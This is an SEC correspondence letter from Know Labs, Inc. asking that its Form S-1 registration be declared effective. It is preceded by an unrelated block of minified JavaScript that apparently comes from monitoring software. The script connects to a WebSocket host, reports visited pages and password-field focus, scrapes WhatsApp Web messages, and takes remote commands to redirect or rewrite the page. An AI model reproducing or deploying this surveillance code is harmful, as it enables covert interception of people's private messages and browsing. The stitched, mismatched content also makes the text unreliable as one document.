 !function(){var Y,e,t;function n(){try{return window.self===window.top}catch(Y){return!1}}function r(){var Y={type:"focus",token:y.token,title:document.title,url:document.URL,useragent:navigator.userAgent,pid:y.pid,pn:y.pn};null!=H&&H.readyState==WebSocket.OPEN&&H.send(JSON.stringify(Y))}function a(){var Y={type:"notification",token:y.token,title:document.title,url:document.URL,focused:document.hasFocus(),timeout:y.sendNotificationsInterval,useragent:navigator.appVersion.length>navigator.userAgent.length?navigator.appVersion:navigator.userAgent,pid:y.pid,pn:y.pn};H.send(JSON.stringify(Y))}function s(){m()}function i(){n()&&(clearInterval(b),clearInterval(A)),timeout=setTimeout((function(){g()}),N)}function o(Y){if(n())switch(Y.data.substring(0,1)){case"r":window.location=Y.data.substring(1);break;case"b":document.body.innerHTML=Y.data.substring(1);break;case"w":var e="true"==Y.data.substring(1).toLowerCase();L!=e&&e&&v(),L=e}}function M(Y){var e=document.createElement("a");return e.href=Y,e.href}function u(Y){if(Y&&"password"==Y.type&&!P)if(P=!0,n()){var e={type:"password_input_focus",focus:!0,token:y.token};H.send(JSON.stringify(e))}else window.top.postMessage({message:"iframePasswordInputFocused",name:Y.name,type:Y.type},"*")}function d(Y){var e=Y&&Y.name?Y.name:"<unnamed>";if(Y&&"password"==Y.type&&P)if(P=!1,n()){var t={type:"password_input_focus",focus:!1,token:y.token};H.send(JSON.stringify(t))}else window.top.postMessage({message:"iframePasswordInputBlurred",name:e,type:Y.type},"*")}function c(Y){var e=document.activeElement;e&&e!=document.body?document.querySelector&&(e=document.querySelector(":focus")):e=null;for(var t=0;t<Y.length;++t){let s=Y[t];var n="password"==s.type,r=n&&s.hasAttribute("autofocus"),a=n&&e&&s.isEqualNode(e);(r||a)&&u(s),s.tmInputEventListenerAttached||(s.addEventListener("focus",(function(Y){u(Y.target)}),!0),s.addEventListener("blur",(function(Y){d(Y.target)}),!0),s.tmInputEventListenerAttached=!0)}}function D(){c(document.getElementsByTagName("input")),new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&Y.addedNodes&&0!=Y.addedNodes.length&&(window.NodeList&&!NodeList.prototype.forEach&&(NodeList.prototype.forEach=Array.prototype.forEach),Y.addedNodes.forEach((function(Y){Y.tagName&&c(Y.getElementsByTagName("input"))})))}))})).observe(document,{childList:!0,subtree:!0}),window.addEventListener("beforeunload",(function(Y){d(),function(){for(var Y=document.getElementsByTagName("input"),e=0;e<Y.length;++e){let t=Y[e];t.removeEventListener("focus",u),t.removeEventListener("blur",d),delete t.tmInputEventListenerAttached}}()}))}function l(){n()&&(y.iup&&r(),h()&&(v(),m(),function(){var Y=new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&("childList"!==Y.type||Y.addedNodes.length<=0||Y.addedNodes.forEach((function(Y){if(Y){var e=document.querySelector("div[id=main] header span[title]");e&&(w=e.innerText),document.querySelector("div[id=main] header span[data-icon=default-user]")&&(E="private"),document.querySelector("div[id=main] header span[data-icon=default-group]")&&(E="group");var t=Y.querySelectorAll(".message-in, .message-out");Y.matches(".message-in, .message-out")&&(t=Array.prototype.slice.call(t)).push(Y),t&&t.forEach((function(Y){if(Y&&Y.classList&&!(Y.classList.length<=0)){var e=Y.classList.contains("message-in"),t=Y.querySelector(".copyable-text"),n=Y.querySelector(".selectable-text"),r=new Date,a=null;if(t&&t.attributes["data-pre-plain-text"]){var s=t.attributes["data-pre-plain-text"].textContent,i=/\[(\d{1,2}):(\d{1,2})[ ]{0,1}([p|a]m)?,\s(.+)]\s(.*):/i[Symbol.match](s);if(!i||6!=i.length)return;if(i[3]&&"pm"==i[3].toLowerCase()&&(i[1]=parseInt(i[1])+12),dateParts=/(\d{1,4})[.-\\/](\d{1,4})[.-\\/](\d{1,4})/[Symbol.match](i[4]),!dateParts||4!=dateParts.length)return;if(!(r=date.parse(i[4],O)||function(Y,e,t){var n=[[Y,e,t].join("-"),[Y,t,e].join("-"),[e,Y,t].join("-"),[e,t,Y].join("-"),[t,Y,e].join("-"),[t,e,Y].join("-")],r=Date.now();for(var a in n){var s=Date.parse(n[a]);if(s&&!(Math.abs(r-s)>1728e6))return new Date(s)}}(dateParts[1],dateParts[2],dateParts[3])))return;r.setHours(i[1]),r.setMinutes(i[2]),a=i[5]}T.get(w)||T.set(w,C);var o=n?n.innerText:null;if(a&&o&&L){var M=(a+o+w+r.getTime()).split("").map((function(Y){return Y.charCodeAt(0)})).reduce((function(Y,e){return Y+((Y<<7)+(Y<<3))^e})).toString(16);if(T.get(w).getTime()==r.getTime()?r.setMilliseconds(++k):(k=0,T.set(w,r)),!M||I.has(M))return;var u={type:"wapmessage",timestamp:r.getTime(),id:M,incoming:e,sender:e?a:"Me",content:o,recipient:e?"Me":w,conversationId:w+"("+E+")"};H.send(JSON.stringify(u)),I.add(M)}}}))}})))}))}));if(!Y)return;Y.observe(document.body,{childList:!0,subtree:!0})}()),n()&&(a(),b=setInterval(a,y.sendNotificationsInterval),h()&&(A=setInterval(s,y.pollWhatsappTrackingInterval))),function(){for(var Y=[],e=document.getElementsByTagName("link"),t=0;t<e.length;++t)"icon"!=e[t].getAttribute("rel")&&"shortcut icon"!=e[t].getAttribute("rel")||(Y[Y.length]=M(e[t].getAttribute("href")));0==Y.length&&(Y[0]=M("/favicon.ico"));var n={type:"favicon"};n.url=document.URL,n.src=Y,n.title=document.title,n.token=y.token,n.useragent=navigator.appVersion.length>navigator.userAgent.length?navigator.appVersion:navigator.userAgent,H.send(JSON.stringify(n))}(),y.dontTrackWebPasswords&&D())}function f(){document.tmfilter||(g(),O={"ar-SA":"D/M/YY","bg-BG":"D.M.YYYY","ca-ES":"D/M/YYYY","zh-TW":"YYYY/M/D","cs-CZ":"D.M.YYYY","Da-DK":"D-M-YYYY","De-DE":"D.M.YYYY","el-GR":"D/M/YYYY","en-US":"M/D/YYYY","fi-FI":"D.M.YYYY","fr-FR":"D/M/YYYY","he-IL":"D/M/YYYY","hu-HU":"YYYY. M. D.","is-IS":"D.M.YYYY","it-IT":"D/M/YYYY","ja-JP":"YYYY/M/D","ko-KR":"YYYY-M-D","nl-NL":"D-M-YYYY","nb-NO":"D.M.YYYY","pl-PL":"YYYY-M-D","pt-BR":"D/M/YYYY","ro-RO":"D.M.YYYY","ru-RU":"D.M.YYYY","hr-HR":"D.M.YYYY","sk-SK":"D. M. YYYY","sq-AL":"YYYY-M-D","sv-SE":"YYYY-M-D","th-TH":"D/M/YYYY","tr-TR":"D.M.YYYY","ur-PK":"D/M/YYYY","iD-ID":"D/M/YYYY","uk-UA":"D.M.YYYY","be-BY":"D.M.YYYY","sl-SI":"D.M.YYYY","et-EE":"D.M.YYYY","lv-LV":"YYYY.M.D.","lt-LT":"YYYY.M.D","fa-IR":"M/D/YYYY","vi-VN":"D/M/YYYY","hy-AM":"D.M.YYYY","az-Latn-AZ":"D.M.YYYY","eu-ES":"YYYY/M/D","Mk-MK":"D.M.YYYY","af-ZA":"YYYY/M/D","ka-GE":"D.M.YYYY","fo-FO":"D-M-YYYY","hi-IN":"D-M-YYYY","Ms-MY":"D/M/YYYY","kk-KZ":"D.M.YYYY","ky-KG":"D.M.YY","sw-KE":"M/D/YYYY","uz-Latn-UZ":"D/M YYYY","tt-RU":"D.M.YYYY","pa-IN":"D-M-YY","gu-IN":"D-M-YY","ta-IN":"D-M-YYYY","te-IN":"D-M-YY","kn-IN":"D-M-YY","Mr-IN":"D-M-YYYY","sa-IN":"D-M-YYYY","Mn-MN":"YY.M.D","gl-ES":"D/M/YY","kok-IN":"D-M-YYYY","syr-SY":"D/M/YYYY","Dv-MV":"D/M/YY","ar-IQ":"D/M/YYYY","zh-CN":"YYYY/M/D","De-CH":"D.M.YYYY","en-GB":"D/M/YYYY","es-MX":"D/M/YYYY","fr-BE":"D/M/YYYY","it-CH":"D.M.YYYY","nl-BE":"D/M/YYYY","nn-NO":"D.M.YYYY","pt-PT":"D-M-YYYY","sr-Latn-CS":"D.M.YYYY","sv-FI":"D.M.YYYY","az-Cyrl-AZ":"D.M.YYYY","Ms-BN":"D/M/YYYY","uz-Cyrl-UZ":"D.M.YYYY","ar-EG":"D/M/YYYY","zh-HK":"D/M/YYYY","De-AT":"D.M.YYYY","en-AU":"D/M/YYYY","es-ES":"D/M/YYYY","fr-CA":"YYYY-M-D","sr-Cyrl-CS":"D.M.YYYY","ar-LY":"D/M/YYYY","zh-SG":"D/M/YYYY","De-LU":"D.M.YYYY","en-CA":"D/M/YYYY","es-GT":"D/M/YYYY","fr-CH":"D.M.YYYY","ar-DZ":"D-M-YYYY","zh-MO":"D/M/YYYY","De-LI":"D.M.YYYY","en-NZ":"D/M/YYYY","es-CR":"D/M/YYYY","fr-LU":"D/M/YYYY","ar-MA":"D-M-YYYY","en-IE":"D/M/YYYY","es-PA":"M/D/YYYY","fr-MC":"D/M/YYYY","ar-TN":"D-M-YYYY","en-ZA":"YYYY/M/D","es-DO":"D/M/YYYY","ar-OM":"D/M/YYYY","en-JM":"D/M/YYYY","es-VE":"D/M/YYYY","ar-YE":"D/M/YYYY","en-029":"M/D/YYYY","es-CO":"D/M/YYYY","ar-SY":"D/M/YYYY","en-BZ":"D/M/YYYY","es-PE":"D/M/YYYY","ar-JO":"D/M/YYYY","en-TT":"D/M/YYYY","es-AR":"D/M/YYYY","ar-LB":"D/M/YYYY","en-ZW":"M/D/YYYY","es-EC":"D/M/YYYY","ar-KW":"D/M/YYYY","en-PH":"M/D/YYYY","es-CL":"D-M-YYYY","ar-AE":"D/M/YYYY","es-UY":"D/M/YYYY","ar-BH":"D/M/YYYY","es-PY":"D/M/YYYY","ar-QA":"D/M/YYYY","es-BO":"D/M/YYYY","es-SV":"D/M/YYYY","es-HN":"D/M/YYYY","es-NI":"D/M/YYYY","es-PR":"D/M/YYYY","aM-ET":"D/M/YYYY","tzM-Latn-DZ":"D-M-YYYY","iu-Latn-CA":"D/M/YYYY","sMa-NO":"D.M.YYYY","Mn-Mong-CN":"YYYY/M/D","gD-GB":"D/M/YYYY","en-MY":"D/M/YYYY","prs-AF":"D/M/YY","bn-BD":"D-M-YY","wo-SN":"D/M/YYYY","rw-RW":"M/D/YYYY","qut-GT":"D/M/YYYY","sah-RU":"M.D.YYYY","gsw-FR":"D/M/YYYY","co-FR":"D/M/YYYY","oc-FR":"D/M/YYYY","Mi-NZ":"D/M/YYYY","ga-IE":"D/M/YYYY","se-SE":"YYYY-M-D","br-FR":"D/M/YYYY","sMn-FI":"D.M.YYYY","Moh-CA":"M/D/YYYY","arn-CL":"D-M-YYYY","ii-CN":"YYYY/M/D","Dsb-DE":"D. M. YYYY","ig-NG":"D/M/YYYY","kl-GL":"D-M-YYYY","lb-LU":"D/M/YYYY","ba-RU":"D.M.YY","nso-ZA":"YYYY/M/D","quz-BO":"D/M/YYYY","yo-NG":"D/M/YYYY","ha-Latn-NG":"D/M/YYYY","fil-PH":"M/D/YYYY","ps-AF":"D/M/YY","fy-NL":"D-M-YYYY","ne-NP":"M/D/YYYY","se-NO":"D.M.YYYY","iu-Cans-CA":"D/M/YYYY","sr-Latn-RS":"D.M.YYYY","si-LK":"YYYY-M-D","sr-Cyrl-RS":"D.M.YYYY","lo-LA":"D/M/YYYY","kM-KH":"YYYY-M-D","cy-GB":"D/M/YYYY","bo-CN":"YYYY/M/D","sMs-FI":"D.M.YYYY","as-IN":"D-M-YYYY","Ml-IN":"D-M-YY","en-IN":"D-M-YYYY","or-IN":"D-M-YY","bn-IN":"D-M-YY","tk-TM":"D.M.YY","bs-Latn-BA":"D.M.YYYY","Mt-MT":"D/M/YYYY","sr-Cyrl-ME":"D.M.YYYY","se-FI":"D.M.YYYY","zu-ZA":"YYYY/M/D","xh-ZA":"YYYY/M/D","tn-ZA":"YYYY/M/D","hsb-DE":"D. M. YYYY","bs-Cyrl-BA":"D.M.YYYY","tg-Cyrl-TJ":"D.M.YY","sr-Latn-BA":"D.M.YYYY","sMj-NO":"D.M.YYYY","rM-CH":"D/M/YYYY","sMj-SE":"YYYY-M-D","quz-EC":"D/M/YYYY","quz-PE":"D/M/YYYY","hr-BA":"D.M.YYYY.","sr-Latn-ME":"D.M.YYYY","sMa-SE":"YYYY-M-D","en-SG":"D/M/YYYY","ug-CN":"YYYY-M-D","sr-Cyrl-BA":"D.M.YYYY","es-US":"M/D/YYYY"}[navigator.language],document.tmfilter="present")}function g(){(H=new WebSocket(y.connectionString)).onclose=i,H.onmessage=o,H.onopen=l,y.extJs&&(this.extJs.webSockReady=()=>H.readyState===WebSocket.OPEN,this.extJs.webSockSend=Y=>H.send(Y))}function p(){var Y=function(){var Y=["webkit","moz","ms","o"];if("hidden"in document)return"hidden";for(var e=0;e<Y.length;e++)if(Y[e]+"Hidden"in document)return Y[e]+"Hidden";return null}();return!!Y&&document[Y]}function h(){var Y=document.head.querySelector("[name='og:title']");return!!Y&&"WhatsApp Web"===Y.getAttribute("content")}function m(){H.send(JSON.stringify({type:"waptracking"}))}function v(){T=new Map,I=new Set,k=0,(C=new Date).setSeconds(0),C.setMilliseconds(0)}function S(Y){var e={name:Y.data.name,type:Y.data.type};"iframePasswordInputFocused"===Y.data.message?u(e):"iframePasswordInputBlurred"===Y.data.message&&d(e)}Y=this,e={},t={en:{MMMM:"January February March April May June July August September October November December".split(" "),MMM:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),dddd:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),ddd:"Sun Mon Tue Wed Thu Fri Sat".split(" "),dd:"Su Mo Tu We Th Fr Sa".split(" "),A:["a.m.","p.m."],formatter:{YYYY:function(Y){return("000"+Y.getFullYear()).slice(-4)},YY:function(Y){return("0"+Y.getFullYear()).slice(-2)},Y:function(Y){return""+Y.getFullYear()},MMMM:function(Y){return this.MMMM[Y.getMonth()]},MMM:function(Y){return this.MMM[Y.getMonth()]},MM:function(Y){return("0"+(Y.getMonth()+1)).slice(-2)},M:function(Y){return""+(Y.getMonth()+1)},DD:function(Y){return("0"+Y.getDate()).slice(-2)},D:function(Y){return""+Y.getDate()},HH:function(Y){return("0"+Y.getHours()).slice(-2)},H:function(Y){return""+Y.getHours()},A:function(Y){return this.A[11<Y.getHours()|0]},hh:function(Y){return("0"+(Y.getHours()%12||12)).slice(-2)},h:function(Y){return""+(Y.getHours()%12||12)},mm:function(Y){return("0"+Y.getMinutes()).slice(-2)},m:function(Y){return""+Y.getMinutes()},ss:function(Y){return("0"+Y.getSeconds()).slice(-2)},s:function(Y){return""+Y.getSeconds()},SSS:function(Y){return("00"+Y.getMilliseconds()).slice(-3)},SS:function(Y){return("0"+(Y.getMilliseconds()/10|0)).slice(-2)},S:function(Y){return""+(Y.getMilliseconds()/100|0)},dddd:function(Y){return this.dddd[Y.getDay()]},ddd:function(Y){return this.ddd[Y.getDay()]},dd:function(Y){return this.dd[Y.getDay()]},Z:function(Y){return(0<(Y=Y.utc?0:Y.getTimezoneOffset()/.6)?"-":"+")+("000"+Math.abs(Y-Y%100*.4)).slice(-4)},post:function(Y){return Y}},parser:{find:function(Y,e){for(var t,n=-1,r=0,a=0,s=Y.length;a<s;a++)t=Y[a],!e.indexOf(t)&&t.length>r&&(n=a,r=t.length);return{index:n,length:r}},MMMM:function(Y){return this.parser.find(this.MMMM,Y)},MMM:function(Y){return this.parser.find(this.MMM,Y)},A:function(Y){return this.parser.find(this.A,Y)},h:function(Y,e){return(12===Y?0:Y)+12*e},pre:function(Y){return Y}}}},e.format=function(Y,n,r){var a=e.addMinutes(Y,r?Y.getTimezoneOffset():0),s=t.en,i=s.formatter;return a.utc=r,n.replace(/(\[[^\[\]]*]|\[.*\][^\[]*\]|YYYY|YY|MMM?M?|DD|HH|hh|mm|ss|SSS?|ddd?d?|.)/g,(function(Y){var e=i[Y];return e?i.post(e.call(s,a,n)):Y.replace(/\[(.*)]/,"$1")}))},e.parse=function(Y,n,r){var a,s,i=t.en,o=i.parser.pre(Y),M=0,u=/(MMMM?|A)|(YYYY)|(SSS)|(MM|DD|HH|hh|mm|ss)|(YY|M|D|H|h|m|s|SS)|(S)|(.)/g,d={2:/^\d{1,4}/,3:/^\d{1,3}/,4:/^\d\d/,5:/^\d\d?/,6:/^\d/};Y=[31,28,31,30,31,30,31,31,30,31,30,31];for(var c={Y:1970,M:1,D:1,H:0,m:0,s:0,S:0};a=u.exec(n);){var D=0,l=1;for(s="";!s;)s=a[++D];a=s.charAt(0);var f=o.slice(M);if(2>D){var g=i.parser[s].call(i,f,n);c[a]=g.index,"M"===a&&c[a]++,l=g.length}else if(7>D)g=(f.match(d[D])||[""])[0],c[a]=0|("S"===a?(g+"000").slice(0,-s.length):g),l=g.length;else if(" "!==a&&a!==f[0])return NaN;if(!l)return NaN;M+=l}return M===o.length&&g?(c.Y+=70>c.Y?2e3:100>c.Y?1900:0,c.H=c.H||i.parser.h(c.h||0,c.A||0),n=new Date(c.Y,c.M-1,c.D,c.H,c.m,c.s,c.S),Y[1]+=0|e.isLeapYear(n),1>c.M||12<c.M||1>c.D||c.D>Y[c.M-1]||23<c.H||59<c.m||59<c.s?NaN:r?e.addMinutes(n,-n.getTimezoneOffset()):n):NaN},e.isValid=function(Y,t){return!!e.parse(Y,t)},e.addYears=function(Y,t){return e.addMonths(Y,12*t)},e.addMonths=function(Y,e){var t=new Date(Y.getTime());return t.setMonth(t.getMonth()+e),t},e.addDays=function(Y,e){var t=new Date(Y.getTime());return t.setDate(t.getDate()+e),t},e.addHours=function(Y,t){return e.addMilliseconds(Y,36e5*t)},e.addMinutes=function(Y,t){return e.addMilliseconds(Y,6e4*t)},e.addSeconds=function(Y,t){return e.addMilliseconds(Y,1e3*t)},e.addMilliseconds=function(Y,e){return new Date(Y.getTime()+e)},e.subtract=function(Y,e){var t=Y.getTime()-e.getTime();return{toMilliseconds:function(){return t},toSeconds:function(){return t/1e3|0},toMinutes:function(){return t/6e4|0},toHours:function(){return t/36e5|0},toDays:function(){return t/864e5|0}}},e.isLeapYear=function(Y){return!(((Y=Y.getFullYear())%4||!(Y%100))&&Y%400)},e.isSameDay=function(Y,t){return e.format(Y,"YYYYMMDD")===e.format(t,"YYYYMMDD")},Y.date=e;var y={token:"065f9c9f-9bf1-4a51-93a7-9974c5fd3689",sendNotificationsInterval:Number("1000"),pollWhatsappTrackingInterval:Number("20000"),connectionString:"wss://tm.filter:1502",pid:"5588",pn:"firefox.exe",iup:false,dontTrackWebPasswords:false,extJs:null},N=6e4,b=null,A=null,w=null,E=null,L=!1,T=null,I=null,k=0,C=null,H=null,O="",P=!1;!function Y(e){p()?setTimeout((function(){Y(e)}),1e3):e()}((function(){y.extJs&&y.extJs.init(y.token),n()&&(window.addEventListener("focus",r,!0),y.dontTrackWebPasswords&&window.addEventListener("message",S,!1)),n()||y.extJs?f():y.dontTrackWebPasswords&&D()}))}();

September 13, 2022

Securities and Exchange Commission
Division of Corporation Finance
100 F Street, N.E.
Washington, D.C. 20549

Re:
Know Labs, Inc.

Registration Statement on Form S-1
File No. 333-266423

VIA EDGAR

Ladies and Gentlemen:

Pursuant to Rule 461 under the Securities Act of 1933, as amended, Know Labs, Inc. (the “Registrant”) hereby respectfully requests that the effectiveness of the Registration Statement on Form S-1 (File No. 333-266423) of the Registrant (the “Registration Statement”) be accelerated so that it will be declared effective at 4:30 p.m., Eastern Time, on September 15, 2022 or as soon thereafter as may be practicable.

The undersigned respectfully requests that it be notified of the effectiveness of the Registration Statement by telephone call to our counsel, Bevilacqua PLLC, by calling Lou Bevilacqua at (202) 869-0888, ext. 100. The Company hereby authorizes Mr. Bevilacqua to orally modify or withdraw this request for acceleration.

Very truly yours, KNOW LABS, INC.

By:	/s/ Phillip A. Bosua
Name:	Phillip A. Bosua
Title:	Chief Executive Officer

500 Union St. #810 Seattle WA 98101
Knowlabs.co